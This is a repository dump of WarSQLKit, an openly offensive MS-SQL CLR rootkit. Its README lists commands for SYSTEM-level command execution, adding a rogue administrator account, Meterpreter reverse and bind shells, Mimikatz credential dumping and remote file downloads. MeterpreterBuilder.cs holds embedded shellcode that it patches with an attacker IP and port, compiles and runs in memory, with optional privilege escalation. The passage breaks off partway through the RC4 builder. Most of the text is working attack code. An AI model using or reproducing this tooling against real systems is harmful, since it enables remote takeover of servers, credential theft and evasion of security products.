├── LICENSE
├── README.md
├── WarSQLKit.sln
├── WarSQLKit
│   ├── CreateKumpir.cs
│   ├── FileDownloader.cs
│   ├── MeterpreterBuilder.cs
│   ├── Properties
│   │   └── AssemblyInfo.cs
│   ├── StoredProcedures.cs
│   ├── WarSQLKit.sqlproj
│   ├── WarSQLKit.sqlproj.user
│   └── bin
│       └── Debug
│           ├── Confused
│           │   └── WarSQLKit.dll
│           ├── WarSQLKit.dacpac
│           ├── WarSQLKit.dll
│           └── WarSQLKit.pdb
└── WarSQLKitMinimal
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── StoredProcedure.cs
    ├── WarSQLKitMinimal.sqlproj
    ├── WarSQLKitMinimal.sqlproj.user
    └── bin
        └── Debug
            ├── WarSQLKitMinimal.dacpac
            ├── WarSQLKitMinimal.dll
            └── WarSQLKitMinimal.pdb

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2017 Eyüp Çelik

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# MSSQL Fileless Rootkit - WarSQLKit

![MSSQL Fileless Rootkit - WarSQLKit](https://eyupcelik.com.tr/wp-content/uploads/2017/09/WarSQLKit.png)

WarSQLKit is a fileless rootkit and attack tool I developed for MS-SQL. With this tool you can rootkit the SQL service through the CLR integration of MS-SQL servers. Malicious code is thus executed inside the process memory of the SQL service without creating a malicious function in the operating system or a file on the file system, so security products and technologies can be bypassed. The tool was developed for a scenario in which an account with "sysadmin" rights has been obtained but none of the stored procedures such as "xp_cmdshell", "sp_OACreate" and "sp_OAMethod" are enabled. This tool will show you that MS-SQL is much more than these stored procedures.

I described the tool and the techniques I used to develop it in a red team test for a client in 2016 and decided to share it as open source a year later, in 2017.

WarSQLKit is suitable for refactoring and combining with other tools and techniques. You can find the techniques and methods used in the tool in my blog below.

https://eyupcelik.com.tr/mssql-fileless-rootkit-warsqlkit/

# WarSQLKit Command Example
```sql
EXEC sp_cmdExec 'whoami';  -- Any Windows command
EXEC sp_cmdExec 'whoami /RunSystemPriv';  -- Any Windows command with NT AUTHORITY\SYSTEM rights
EXEC sp_cmdExec '"net user eyup P@ssw0rd1 /add" /RunSystemPriv';  -- Adding users with RottenPotato (Kumpir)
EXEC sp_cmdExec '"net localgroup administrators eyup /add" /RunSystemPriv';  -- Adding a user to a local group with RottenPotato (Kumpir)
EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS';  -- PowerShell with RottenPotato (Kumpir)
EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem';  -- x86 Meterpreter reverse connection with NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem';  -- x64 Meterpreter reverse connection with NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem';  -- x86 Meterpreter reverse connection over RC4 with NT AUTHORITY\SYSTEM, RC4PASSWORD=warsql
EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem';  -- x86 Meterpreter bind connection with NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_Mimikatz';
SELECT * FROM WarSQLKitTemp;  -- Get the Mimikatz log. Thanks Benjamin Delpy :)
EXEC sp_cmdExec 'sp_downloadFile http://eyupcelik.com.tr/file.exe C:\ProgramData\file.exe 300';  -- Download a file
EXEC sp_cmdExec 'sp_getSqlHash';  -- Get MSSQL hash
EXEC sp_cmdExec 'sp_getProduct';  -- Get Windows product
EXEC sp_cmdExec 'sp_getDatabases';  -- Get available databases
```
--------------------------------------------------------------------------------
/WarSQLKit.sln:
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{00D1A9C2-B5F0-4AF3-8072-F6C62B433612}") = "WarSQLKit", "WarSQLKit\WarSQLKit.sqlproj", "{C6001C77-007A-4851-9371-61828D235C4E}"
EndProject
Project("{00D1A9C2-B5F0-4AF3-8072-F6C62B433612}") = "WarSQLKitMinimal", "WarSQLKitMinimal\WarSQLKitMinimal.sqlproj", "{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Debug|x64 = Debug|x64
		Release|Any CPU = Release|Any CPU
		Release|x64 = Release|x64
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{C6001C77-007A-4851-9371-61828D235C4E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{C6001C77-007A-4851-9371-61828D235C4E}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{C6001C77-007A-4851-9371-61828D235C4E}.Debug|Any CPU.Deploy.0 = Debug|Any CPU
		{C6001C77-007A-4851-9371-61828D235C4E}.Debug|x64.ActiveCfg = Debug|x64
		{C6001C77-007A-4851-9371-61828D235C4E}.Debug|x64.Build.0 = Debug|x64
		{C6001C77-007A-4851-9371-61828D235C4E}.Debug|x64.Deploy.0 = Debug|x64
		{C6001C77-007A-4851-9371-61828D235C4E}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{C6001C77-007A-4851-9371-61828D235C4E}.Release|Any CPU.Build.0 = Release|Any CPU
		{C6001C77-007A-4851-9371-61828D235C4E}.Release|Any CPU.Deploy.0 = Release|Any CPU
		{C6001C77-007A-4851-9371-61828D235C4E}.Release|x64.ActiveCfg = Release|x64
		{C6001C77-007A-4851-9371-61828D235C4E}.Release|x64.Build.0 = Release|x64
		{C6001C77-007A-4851-9371-61828D235C4E}.Release|x64.Deploy.0 = Release|x64
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|Any CPU.Deploy.0 = Debug|Any CPU
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|x64.ActiveCfg = Debug|x64
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|x64.Build.0 = Debug|x64
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|x64.Deploy.0 = Debug|x64
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|Any CPU.Build.0 = Release|Any CPU
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|Any CPU.Deploy.0 = Release|Any CPU
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|x64.ActiveCfg = Release|x64
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|x64.Build.0 = Release|x64
		{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|x64.Deploy.0 = Release|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/WarSQLKit/FileDownloader.cs:
--------------------------------------------------------------------------------
using System;
using System.ComponentModel;
using System.IO;
using System.Net;
using System.Threading;
using Microsoft.SqlServer.Server;

namespace WarSQLKit
{
    class FileDownloader
    {
        private readonly string _url;
        private readonly string _fullPathWhereToSave;
        private bool _result = false;
        // Signalled by the completion callback; StartDownload blocks on it until
        // the download finishes or the caller's timeout expires.
        private readonly SemaphoreSlim _semaphore = new SemaphoreSlim(0);

        public FileDownloader(string url, string fullPathWhereToSave)
        {
            if (string.IsNullOrEmpty(url)) throw new ArgumentNullException("url");
            if (string.IsNullOrEmpty(fullPathWhereToSave)) throw new ArgumentNullException("fullPathWhereToSave");

            _url = url;
            _fullPathWhereToSave = fullPathWhereToSave;
        }

        public bool StartDownload(int timeout)
        {
            try
            {
                Directory.CreateDirectory(Path.GetDirectoryName(_fullPathWhereToSave));

                if (File.Exists(_fullPathWhereToSave))
                {
                    File.Delete(_fullPathWhereToSave);
                }
                using (WebClient client = new WebClient())
                {
                    var ur = new Uri(_url);
                    client.DownloadProgressChanged += WebClientDownloadProgressChanged;
                    client.DownloadFileCompleted += WebClientDownloadCompleted;
                    SqlContext.Pipe.Send(@"Downloading file:");
                    client.DownloadFileAsync(ur, _fullPathWhereToSave);
                    // Wait returns false on timeout; _result is then still false.
                    _semaphore.Wait(timeout);
                    return _result && File.Exists(_fullPathWhereToSave);
                }
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send("Was not able to download file!");
                SqlContext.Pipe.Send(e.Message);
                return false;
            }
            finally
            {
                _semaphore.Dispose();
            }
        }

        private void WebClientDownloadProgressChanged(object sender, DownloadProgressChangedEventArgs e)
        {
            // string.Format so the percentage actually replaces the {0} placeholder.
            SqlContext.Pipe.Send(string.Format("\r --> {0}%.", e.ProgressPercentage));
        }

        private void WebClientDownloadCompleted(object sender, AsyncCompletedEventArgs args)
        {
            SqlContext.Pipe.Send(Environment.NewLine + "Download finished!");
            // A download that failed without being cancelled carries an Error; count it as failure too.
            _result = !args.Cancelled && args.Error == null;
            if (args.Error != null)
            {
                SqlContext.Pipe.Send(args.Error.ToString());
            }
            try
            {
                _semaphore.Release();
            }
            catch (ObjectDisposedException)
            {
                // StartDownload already timed out and disposed the semaphore.
            }
        }

        [Microsoft.SqlServer.Server.SqlProcedure]
        public static bool DownloadFile(string url, string fullPathWhereToSave, int timeoutInMilliSec)
        {
            return new FileDownloader(url,
fullPathWhereToSave).StartDownload(timeoutInMilliSec); 74 | } 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /WarSQLKit/MeterpreterBuilder.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.IO; 5 | using System.Text; 6 | using Microsoft.SqlServer.Server; 7 | 8 | namespace WarSQLKit 9 | { 10 | class MeterpreterBuilder 11 | { 12 | public string Ip = string.Empty; 13 | public string Port = string.Empty; 14 | public bool IsRunSystemPriv = false; 15 | private static List _netFrameworkList = new List(); 16 | private static List _x64NetFrameworkList = new List(); 17 | [Microsoft.SqlServer.Server.SqlProcedure] 18 | public void SaveReverseMeterpreter() 19 | { 20 | var randomFileName = RandomFileName(0, 12); 21 | SqlContext.Pipe.Send("Meterpreter C# File is being created."); 22 | var strMtr = "using System;" + 23 | "using System.Runtime.InteropServices;" + 24 | "using System.Threading.Tasks;" + 25 | 26 | "namespace WarSQLKit_Builder" + 27 | "{" + 28 | "class ReverseMeterpreter" + 29 | "{" + 30 | "static void Main(string[] args)" + 31 | "{" + 32 | "Task.Factory.StartNew(() => RunMeterpreter(\""+ Ip +"\", \""+ Port +"\"));" + 33 | "var str = Convert.ToString(Console.ReadLine());" + 34 | "}" + 35 | "public static void RunMeterpreter(string ip, string port)" + 36 | "{" + 37 | "try" + 38 | "{" + 39 | "var ipOctetSplit = ip.Split('.');" + 40 | "byte octByte1 = Convert.ToByte(ipOctetSplit[0]);" + 41 | "byte octByte2 = Convert.ToByte(ipOctetSplit[1]);" + 42 | "byte octByte3 = Convert.ToByte(ipOctetSplit[2]);" + 43 | "byte octByte4 = Convert.ToByte(ipOctetSplit[3]);" + 44 | "int inputPort = Int32.Parse(port);" + 45 | "byte port1Byte = 0x00;" + 46 | "byte port2Byte = 0x00;" + 47 | "if (inputPort > 256)" + 48 | "{" + 49 | "int portOct1 = inputPort / 256;" + 50 | "int portOct2 = portOct1 * 256;" + 51 
| "int portOct3 = inputPort - portOct2;" + 52 | "int portoct1Calc = portOct1 * 256 + portOct3;" + 53 | "if (inputPort == portoct1Calc)" + 54 | "{" + 55 | "port1Byte = Convert.ToByte(portOct1);" + 56 | "port2Byte = Convert.ToByte(portOct3);" + 57 | "}" + 58 | "}" + 59 | "else"+ 60 | "{"+ 61 | "port1Byte = 0x00;" + 62 | "port2Byte = Convert.ToByte(inputPort);" + 63 | "}"+ 64 | "byte[] shellCodePacket = new byte[9];" + 65 | "shellCodePacket[0] = octByte1;" + 66 | "shellCodePacket[1] = octByte2;" + 67 | "shellCodePacket[2] = octByte3;" + 68 | "shellCodePacket[3] = octByte4;" + 69 | "shellCodePacket[4] = 0x68;" + 70 | "shellCodePacket[5] = 0x02;" + 71 | "shellCodePacket[6] = 0x00;" + 72 | "shellCodePacket[7] = port1Byte;" + 73 | "shellCodePacket[8] = port2Byte;" + 74 | "string shellCodeRaw = \"/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYH/9W4kAEAACnEVFBoKYBrAP/VagVowKiLhmgCANkDieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoYQAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0iWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCTpcf///wHDKcZ1x8M=\";" + 75 | 76 | "string s3 = Convert.ToBase64String(shellCodePacket);" + 77 | "string newShellCode = shellCodeRaw.Replace(\"wKiLhmgCANkD\", s3);" + 78 | "byte[] shellCodeBase64 = Convert.FromBase64String(newShellCode);" + 79 | "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellCodeBase64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" + 80 | "Marshal.Copy(shellCodeBase64, 0, (IntPtr)(funcAddr), shellCodeBase64.Length);" + 81 | "IntPtr hThread = IntPtr.Zero;" + 82 | "UInt32 threadId = 0;" + 83 | "IntPtr pinfo = IntPtr.Zero;" + 84 | "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);" + 85 | "WaitForSingleObject(hThread, 0xFFFFFFFF);" + 86 | "return;" + 87 | "}" + 88 | "catch (Exception e)" + 89 | "{" + 90 | "Console.WriteLine(e);" + 91 | "throw;" + 
92 | "}" + 93 | "}" + 94 | 95 | "private static UInt32 MEM_COMMIT = 0x1000;" + 96 | "private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;" + 97 | "[DllImport(\"kernel32\")]" + 98 | "private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);" + 99 | "[DllImport(\"kernel32\")]" + 100 | "private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);" + 101 | "[DllImport(\"kernel32\")]" + 102 | "private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);" + 103 | "}" + 104 | "}"; 105 | NetFrameWorkDirectory(); 106 | File.WriteAllText(@"C:\\ProgramData\\" + randomFileName + @"_reverse.cs", strMtr); 107 | SqlContext.Pipe.Send("Meterpreter C# File created."); 108 | SqlContext.Pipe.Send("CSharp Compiler is running."); 109 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\Windows\Microsoft.NET\Framework\"+ _netFrameworkList[_netFrameworkList.Count - 1] +@"\csc.exe /unsafe /platform:x86 /out:C:\ProgramData\" + randomFileName + @"_reverse.exe " + @"C:\ProgramData\" + randomFileName + @"_reverse.cs"); 110 | SqlContext.Pipe.Send("Meterpreter compiled."); 111 | File.Delete(@"C:\ProgramData\" + randomFileName + @"_reverse.cs"); 112 | if (IsRunSystemPriv == true) 113 | { 114 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\\ProgramData\\Kumpir.exe C:\ProgramData\" + randomFileName + @"_reverse.exe"); 115 | } 116 | else 117 | { 118 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\" + randomFileName + @"_reverse.exe"); 119 | } 120 | } 121 | public void SaveBindMeterpreter() 122 | { 123 | var randomFileName = RandomFileName(0, 12); 124 | SqlContext.Pipe.Send("Meterpreter C# File is being created."); 125 | var strMtr = "using System;" + 126 | "using System.Collections.Generic;" + 127 | "using System.IO;" + 128 | "using 
System.Runtime.InteropServices;" + 129 | "using System.Text;" + 130 | "using System.Threading;" + 131 | 132 | "namespace WarSQLKit_Builder" + 133 | "{" + 134 | "class BindMeterpreter" + 135 | "{" + 136 | "static void Main(string[] args)" + 137 | "{" + 138 | " RunMeterpreter(\"" + Port + "\");" + 139 | "var str = Convert.ToString(Console.ReadLine());" + 140 | "}" + 141 | "public static void RunMeterpreter(string port)" + 142 | "{" + 143 | "try" + 144 | "{" + 145 | "int inputPort = Int32.Parse(port);" + 146 | "byte port1Byte = 0x00;" + 147 | "byte port2Byte = 0x00;" + 148 | "byte[] shellCodePacket = new byte[6];" + 149 | "if (inputPort > 256)" + 150 | "{" + 151 | "int portOct1 = inputPort / 256;" + 152 | "int portOct2 = portOct1 * 256;" + 153 | "int portOct3 = inputPort - portOct2;" + 154 | "int portoct1Calc = portOct1 * 256 + portOct3;" + 155 | "if (inputPort == portoct1Calc)" + 156 | "{" + 157 | "port1Byte = Convert.ToByte(portOct1);" + 158 | "port2Byte = Convert.ToByte(portOct3);" + 159 | "shellCodePacket[0] = 0x68;" + 160 | "shellCodePacket[1] = 0x02;" + 161 | "shellCodePacket[2] = 0x00;" + 162 | "shellCodePacket[3] = port1Byte;" + 163 | "shellCodePacket[4] = port2Byte;" + 164 | "shellCodePacket[5] = 0x89;" + 165 | "}" + 166 | "}" + 167 | "else" + 168 | "{" + 169 | "shellCodePacket[0] = 0x68;" + 170 | "shellCodePacket[1] = 0x02;" + 171 | "shellCodePacket[2] = 0x00;" + 172 | "shellCodePacket[3] = port1Byte;" + 173 | "shellCodePacket[4] = Convert.ToByte(inputPort);" + 174 | "shellCodePacket[5] = 0x89;" + 175 | "}" + 176 | 177 | "string shellCodeRaw = \"/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYH/9W4kAEAACnEVFBoKYBrAP/VagtZUOL9agFqAmjqD9/g/9WXaAIAEVyJ5moQVldowts3Z//VhcB1WFdot+k4///VV2h07Dvh/9VXl2h1bk1h/9VqAGoEVldoAtnIX//Vg/gAfi2LNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9WD+AB+BwHDKcZ16cM=\";" + 178 | 179 | 
"string s3 = Convert.ToBase64String(shellCodePacket);" + 180 | "string newShellCode = shellCodeRaw.Replace(\"aAIAEVyJ\", s3);" + 181 | "byte[] shellCodeBase64 = Convert.FromBase64String(newShellCode);" + 182 | "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellCodeBase64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" + 183 | "Marshal.Copy(shellCodeBase64, 0, (IntPtr)(funcAddr), shellCodeBase64.Length);" + 184 | "IntPtr hThread = IntPtr.Zero;" + 185 | "UInt32 threadId = 0;" + 186 | "IntPtr pinfo = IntPtr.Zero;" + 187 | "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);" + 188 | "WaitForSingleObject(hThread, 0xFFFFFFFF);" + 189 | "return;" + 190 | "}" + 191 | "catch (Exception e)" + 192 | "{" + 193 | "Console.WriteLine(e);" + 194 | "throw;" + 195 | "}" + 196 | "}" + 197 | 198 | "private static UInt32 MEM_COMMIT = 0x1000;" + 199 | "private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;" + 200 | "[DllImport(\"kernel32\")]" + 201 | "private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);" + 202 | "[DllImport(\"kernel32\")]" + 203 | "private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);" + 204 | "[DllImport(\"kernel32\")]" + 205 | "private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);" + 206 | "}" + 207 | "}"; 208 | NetFrameWorkDirectory(); 209 | File.WriteAllText(@"C:\\ProgramData\\" + randomFileName + @"_bind.cs", strMtr); 210 | SqlContext.Pipe.Send("Meterpreter C# File created."); 211 | SqlContext.Pipe.Send("CSharp Compiler is running."); 212 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", 213 | @" /c C:\Windows\Microsoft.NET\Framework\"+ _netFrameworkList[_netFrameworkList.Count - 1] + @"\csc.exe /unsafe /platform:x86 /out:C:\ProgramData\" + 214 | randomFileName + @"_bind.exe " + @"C:\ProgramData\" + randomFileName + @"_bind.cs"); 215 | 
SqlContext.Pipe.Send("Meterpreter compiled."); 216 | File.Delete(@"C:\ProgramData\" + randomFileName + @"_bind.cs"); 217 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\" + randomFileName + @"_bind.exe"); 218 | } 219 | public void Savex64ReverseMeterpreter() 220 | { 221 | var randomFileName = RandomFileName(0, 12); 222 | SqlContext.Pipe.Send("Meterpreter C# File is being created."); 223 | var strMtr = "using System;" + 224 | "using System.Runtime.InteropServices;" + 225 | 226 | "namespace WarSQLKit_Builder" + 227 | "{" + 228 | "class x64ReverseMeterpreter" + 229 | "{" + 230 | "static void Main(string[] args)" + 231 | "{" + 232 | "RunMeterpreter(\"" + Ip + "\", \"" + Port + "\");" + 233 | "var str = Convert.ToString(Console.ReadLine());" + 234 | "}" + 235 | "public static void RunMeterpreter(string ip, string port)" + 236 | "{" + 237 | "try" + 238 | "{" + 239 | "var ipOctetSplit = ip.Split('.');" + 240 | "byte octByte1 = Convert.ToByte(ipOctetSplit[0]);" + 241 | "byte octByte2 = Convert.ToByte(ipOctetSplit[1]);" + 242 | "byte octByte3 = Convert.ToByte(ipOctetSplit[2]);" + 243 | "byte octByte4 = Convert.ToByte(ipOctetSplit[3]);" + 244 | 245 | "int inputPort = Int32.Parse(port);" + 246 | "byte port1Byte = 0x00;" + 247 | "byte port2Byte = 0x00;" + 248 | "byte[] shellCodePacket = new byte[9];" + 249 | "shellCodePacket[0] = 0x00;" + 250 | "if (inputPort > 256)" + 251 | "{" + 252 | "int portOct1 = inputPort / 256;" + 253 | "int portOct2 = portOct1 * 256;" + 254 | "int portOct3 = inputPort - portOct2;" + 255 | "int portoct1Calc = portOct1 * 256 + portOct3;" + 256 | "if (inputPort == portoct1Calc)" + 257 | "{" + 258 | "port1Byte = Convert.ToByte(portOct1);" + 259 | "port2Byte = Convert.ToByte(portOct3);" + 260 | "shellCodePacket[1] = port1Byte;" + 261 | "shellCodePacket[2] = port2Byte;" + 262 | "}" + 263 | "}" + 264 | "else" + 265 | "{" + 266 | "shellCodePacket[1] = port1Byte;" + 267 | "shellCodePacket[2] = Convert.ToByte(inputPort);" + 268 | "}" 
+ 269 | "shellCodePacket[3] = octByte1;" + 270 | "shellCodePacket[4] = octByte2;" + 271 | "shellCodePacket[5] = octByte3;" + 272 | "shellCodePacket[6] = octByte4;" + 273 | "shellCodePacket[7] = 0x41;" + 274 | "shellCodePacket[8] = 0x54;" + 275 | 276 | "string shellCodeRaw = \"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\";" + 277 | 278 | "string s3 = Convert.ToBase64String(shellCodePacket);" + 279 | "string newShellCode = shellCodeRaw.Replace(\"ABFcwKiLgUFU\", s3);" + 280 | "byte[] shellCodeBase64 = Convert.FromBase64String(newShellCode);" + 281 | "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellCodeBase64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" + 282 | "Marshal.Copy(shellCodeBase64, 0, (IntPtr)(funcAddr), shellCodeBase64.Length);" + 283 | "IntPtr hThread = IntPtr.Zero;" + 284 | "UInt32 threadId = 0;" + 285 | "IntPtr pinfo = IntPtr.Zero;" + 286 | "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);" + 287 | "WaitForSingleObject(hThread, 0xFFFFFFFF);" + 288 | "return;" + 289 | "}" + 290 | "catch (Exception e)" + 291 | "{" + 292 | "Console.WriteLine(e);" + 293 | "throw;" + 294 | "}" + 295 | "}" + 296 | 297 | "private static UInt32 MEM_COMMIT = 0x1000;" + 298 | "private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;" + 299 | "[DllImport(\"kernel32\")]" + 300 | "private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);" + 301 | "[DllImport(\"kernel32\")]" + 302 | "private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);" + 303 | "[DllImport(\"kernel32\")]" + 304 | "private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);" + 305 | "}" + 306 | "}"; 307 | x64NetFrameWorkDirectory(); 308 | File.WriteAllText(@"C:\\ProgramData\\" + randomFileName + @"_x64_reverse.cs", strMtr); 309 | SqlContext.Pipe.Send("Meterpreter C# File created."); 310 | 
SqlContext.Pipe.Send("CSharp Compiler is running."); 311 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\Windows\Microsoft.NET\Framework64\" + _x64NetFrameworkList[_x64NetFrameworkList.Count - 1] + @"\csc.exe /unsafe /platform:x64 /out:C:\ProgramData\" + randomFileName + @"_x64_reverse.exe " + @"C:\ProgramData\" + randomFileName + @"_x64_reverse.cs"); 312 | SqlContext.Pipe.Send("Meterpreter compiled."); 313 | File.Delete(@"C:\ProgramData\" + randomFileName + @"_x64_reverse.cs"); 314 | if (IsRunSystemPriv == true) 315 | { 316 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\\ProgramData\\Kumpir.exe C:\ProgramData\" + randomFileName + @"_x64_reverse.exe"); 317 | } 318 | else 319 | { 320 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\" + randomFileName + @"_x64_reverse.exe"); 321 | } 322 | } 323 | public void SaveMeterpreterRc4() 324 | { 325 | var randomFileName = RandomFileName(0, 12); 326 | SqlContext.Pipe.Send("Meterpreter C# File is being created."); 327 | var strMtr = "using System;" + 328 | "using System.Runtime.InteropServices;" + 329 | 330 | "namespace WarSQLKit_Builder" + 331 | "{" + 332 | "class MeterpreterRc4" + 333 | "{" + 334 | "static void Main(string[] args)" + 335 | "{" + 336 | "RunMeterpreter(\"" + Ip + "\", \"" + Port + "\");" + 337 | "var str = Convert.ToString(Console.ReadLine());" + 338 | "}" + 339 | "public static void RunMeterpreter(string ip, string port)" + 340 | "{" + 341 | "try" + 342 | "{" + 343 | "var ipOctetSplit = ip.Split('.');" + 344 | "byte octByte1 = Convert.ToByte(ipOctetSplit[0]);" + 345 | "byte octByte2 = Convert.ToByte(ipOctetSplit[1]);" + 346 | "byte octByte3 = Convert.ToByte(ipOctetSplit[2]);" + 347 | "byte octByte4 = Convert.ToByte(ipOctetSplit[3]);" + 348 | 349 | "int inputPort = Int32.Parse(port);" + 350 | "byte port1Byte = 0x00;" + 351 | "byte port2Byte = 0x00;" + 352 | "byte[] shellCodePacket = new byte[15];" + 353 | "shellCodePacket[0] = 0x6a;" + 354 | 
